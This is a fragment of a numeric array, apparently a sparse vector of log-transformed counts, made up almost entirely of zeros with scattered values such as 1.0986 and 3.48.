0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 3.6888794541139363, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 4.060443010546419, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 3.4965075614664802, 0.0, 0.0, 7.965635675306504, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0, 0, 0.0, 0, 4.634728988229636, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 5.723585101952381, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.550898738446989, 5.101797476893978, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 3.8918202981106265, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 4.0943445622221, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 6.578517662373903, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.4011973816621555, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 3.7369991058576035, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.769774563315189, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 12.912195279612511, 0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.791759469228055, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 5.942799375126702, 0.0, 0.0, 0.0, 2.833213344056216, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.709530201312334, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 2.8398715690385097, 0.0, 1.3862943611198906, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.4680601411351315, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.160336650881089, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 4.406719247264253, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 